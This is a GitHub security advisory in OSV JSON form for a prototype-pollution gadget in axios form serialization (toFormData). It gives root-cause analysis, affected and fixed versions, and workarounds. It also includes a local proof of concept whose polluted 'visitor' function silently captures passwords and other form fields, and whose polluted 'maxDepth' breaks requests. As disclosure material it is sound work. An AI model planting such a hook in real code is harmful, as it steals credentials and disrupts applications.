{"id":"GHSA-x97p-jq2g-jp4f","summary":"Axios: Prototype Pollution Gadget in axios toFormData Options","details":"## Summary\n\nAxios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.\n\nAxios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.\n\n## Impact\n\nThe impact depends on which property is polluted and which axios serialization path the application uses.\n\nPolluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.\n\n## Affected Functionality\n\nAffected:\n\n- `axios.toFormData()`.\n- `transformRequest` paths that serialize plain objects to `multipart/form-data`.\n- URL-encoded form serialization paths that rely on the same helper.\n- `formSerializer` option defaults when the relevant properties are absent as own properties.\n\nNot affected:\n\n- JSON request bodies.\n- Requests that do not invoke `toFormData()`.\n- Processes where `Object.prototype` is not polluted.\n\n## Technical Details\n\n`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:\n\n```js\n{\n  metaTokens: true,\n  dots: false,\n  indexes: false\n}\n```\n\nThat default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:\n\n```js\nconst metaTokens = options.metaTokens;\nconst visitor = options.visitor || defaultVisitor;\nconst dots = options.dots;\nconst indexes = options.indexes;\nconst _Blob = options.Blob || (typeof Blob !== 'undefined' && Blob);\nconst maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;\n```\n\nThese reads can resolve inherited polluted properties.\n\nLocal code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.\n\n## Proof of Concept of Attack\n\nConstrained local demonstration:\n\n```js\nObject.prototype.maxDepth = 1;\n\nawait axios.post(url, { a: { b: { c: 'value' } } }, {\n  headers: { 'Content-Type': 'multipart/form-data' }\n});\n```\n\nExpected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.\n\nFor serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.\n\n## Workarounds\n\nAvoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003ch3\u003eOriginal report\u003c/h3\u003e\u003c/summary\u003e\n\n### Summary\n_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._\n\n_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._\n\n### Details\n#### Root Cause\n_The attack chain has three steps:_\n_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_\n_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_\n```js\nconst formSerializer = own(this, 'formSerializer');\n```\n_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_\n```js\nreturn toFormData(data, _FormData && new _FormData(), formSerializer);\n//                                                     ^^^^^^^^^^^^ undefined\n```\n\n_**Step 2: `toFlatObject` returns a plain-object default**_\n_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_\n```js\noptions = utils.toFlatObject(\n    options,                                    // undefined\n    { metaTokens: true, dots: false, indexes: false },  // plain object literal\n    false,\n    function defined(option, source) {\n        return !utils.isUndefined(source[option]);\n    }\n);\n```\n_`toFlatObject` has an early-return for null/undefined sources:_\n\n```js\n// lib/utils.js:607\nif (sourceObj == null) return destObj;\n```\n_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._\n\n_**Step 3: Options are read without `hasOwnProp` guards**_\n_The six option properties are read directly from the plain object:_\n```js\nconst metaTokens = options.metaTokens;                                          // line 117\nconst visitor    = options.visitor || defaultVisitor;                            // line 119\nconst dots       = options.dots;                                                // line 120\nconst indexes    = options.indexes;                                             // line 121\nconst _Blob      = options.Blob || (typeof Blob !== 'undefined' && Blob);       // line 122\nconst maxDepth   = options.maxDepth === undefined                                // line 123\n                     ? DEFAULT_FORM_DATA_MAX_DEPTH\n                     : options.maxDepth;\n```\n_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._\n\n#### Why the Existing Defenses Didn't Catch This\n_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._\n\n### PoC\n#### Reproduction Steps\n#### Environment\n_Any environment with Node.js and npm. Tested on:_\n_- Node.js v24.15.0, npm 11.13.0_\n_- axios v1.18.1 (latest release at time of writing)_\n\n##### Step 1: Create a fresh project\n```bash\nmkdir axios-pp-poc\ncd axios-pp-poc\nnpm init -y\nnpm install axios@1.18.1\n```\n##### Step 2: Create the PoC file\n_Create `poc.mjs` with the following content:_\n```js\nimport axios from 'axios';\nimport http from 'http';\n\n// Simulate pollution from a compromised transitive dependency\nlet stolen = [];\nObject.prototype.visitor = function(value, key, path, helpers) {\n    stolen.push({ key, value });\n    return helpers.defaultVisitor.call(this, value, key, path);\n};\nObject.prototype.maxDepth = 2;\n\nconst server = http.createServer((req, res) =\u003e {\n    res.writeHead(200);\n    res.end('{}');\n});\n\nserver.listen(0, '127.0.0.1', async () =\u003e {\n    const { port } = server.address();\n    try {\n        // Exfiltration: visitor intercepts all form fields\n        await axios.post(`http://127.0.0.1:${port}/`, {\n            username: 'john',\n            password: 'SuperSecret123!',\n            profile: { ssn: '123-45-6789' }\n        }, { headers: { 'Content-Type': 'multipart/form-data' } });\n\n        console.log('Stolen:', stolen);\n        // Stolen: [\n        //   { key: 'username', value: 'john' },\n        //   { key: 'password', value: 'SuperSecret123!' },\n        //   { key: 'profile',  value: { ssn: '123-45-6789' } },\n        //   { key: 'ssn',      value: '123-45-6789' }\n        // ]\n\n        // DoS: nested object rejected by polluted maxDepth\n        await axios.post(`http://127.0.0.1:${port}/`,\n            { a: { b: { c: { d: 'value' } } } },\n            { headers: { 'Content-Type': 'multipart/form-data' } }\n        );\n        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED\n        //   \"Object is too deeply nested (3 levels). Max depth: 2\"\n    } finally {\n        delete Object.prototype.visitor;\n        delete Object.prototype.maxDepth;\n        server.close();\n    }\n});\n```\n##### Step 3: Run the PoC\n```bash\nnode poc.mjs\n```\n\n\n### Impact\n#### 1. Data Exfiltration via `visitor` (Confidentiality: High)\n_A polluted `Object.prototype.visitor` function is called as the form data visitor:_\n```js\nvisitor.call(formData, el, key, path, exposedHelpers)\n```\n_The attacker receives:_\n_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_\n_- **`key`** — the field name_\n_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_\n_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_\n\n_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._\n\n#### 2. Denial of Service via `maxDepth` (Availability: Low)\n_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._\n\n#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)\n_Polluting these options changes the serialization format of form field names:_\n_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_\n_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_\n_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_\n\n_The server may misinterpret the submitted form data, leading to silent data corruption._\n\u003c/details\u003e\n\n---","aliases":["CVE-2026-101909"],"modified":"2026-09-30T15:15:04.052506341Z","published":"2026-09-30T15:02:45Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-09-30T15:02:45Z","nvd_published_at":"2026-09-28T18:17:19Z","cwe_ids":["CWE-1321"]},"references":[{"type":"WEB","url":"https://github.com/axios/axios/security/advisories/GHSA-x97p-jq2g-jp4f"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101909"},{"type":"WEB","url":"https://github.com/axios/axios/pull/11141"},{"type":"WEB","url":"https://github.com/axios/axios/commit/d19040bda7a8be2f82c3c6e1a5bc03917daee39a"},{"type":"WEB","url":"https://github.com/axios/axios/commit/d29be181f85f6fe93397a07b1f69606d9622637b"},{"type":"PACKAGE","url":"https://github.com/axios/axios"},{"type":"WEB","url":"https://github.com/axios/axios/releases/tag/v0.34.0"},{"type":"WEB","url":"https://github.com/axios/axios/releases/tag/v1.20.0"}],"affected":[{"package":{"name":"axios","ecosystem":"npm","purl":"pkg:npm/axios"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0.28.0"},{"fixed":"0.34.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-x97p-jq2g-jp4f/GHSA-x97p-jq2g-jp4f.json"}},{"package":{"name":"axios","ecosystem":"npm","purl":"pkg:npm/axios"},"ranges":[{"type":"SEMVER","events":[{"introduced":"1.15.1"},{"fixed":"1.20.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-x97p-jq2g-jp4f/GHSA-x97p-jq2g-jp4f.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"}]}